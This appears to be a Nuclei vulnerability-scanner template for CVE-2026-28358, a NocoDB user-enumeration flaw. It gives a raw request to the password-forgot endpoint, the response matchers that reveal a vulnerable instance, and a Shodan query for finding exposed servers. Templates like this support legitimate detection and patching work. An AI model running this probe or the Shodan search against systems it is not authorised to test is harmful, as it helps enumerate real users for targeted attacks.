NocoDB - User Enumeration

id: CVE-2026-28358

info:
  name: NocoDB - User Enumeration
  author: DhiyaneshDk
  severity: medium
  description: |
    NocoDB is software for building databases as spreadsheets. Prior to version 0.301.3, the password forgot endpoint returned different responses for registered and unregistered emails, allowing user enumeration. This issue has been patched in version 0.301.3.
  impact: |
    Attackers can enumerate registered users, potentially aiding further targeted attacks.
  remediation: Update to version 0.301.3 or later.
  reference:
    - https://github.com/nocodb/nocodb/security/advisories/GHSA-387m-j3p9-3php
    - https://github.com/nocodb/nocodb/releases/tag/0.301.3
    - https://nvd.nist.gov/vuln/detail/CVE-2026-28358
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-28358
    cwe-id: CWE-204
    epss-score: 0.00599
    epss-percentile: 0.69671
  metadata:
    verified: false
    max-request: 1
    vendor: nocodb
    product: nocodb
    shodan-query: http.favicon.hash:-2017596142
  tags: cve,cve2026,user-enum,nocodb

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        POST /api/v1/auth/password/forgot HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/json
        Origin: {{RootURL}}
        Referer: {{RootURL}}/forgot-password

        {"email":"{{email}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Your email has not been registered"

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a0046304402202e153c65d767a79efca580ebb86269a82527009c10a80509a5b9a9b789d946d1022022f7a77fc94123a6b9d483fb2a68181d9bb8ef2fdf6d5877c3f6288c55ed79de:922c64590222798bb761d5b6d8e72950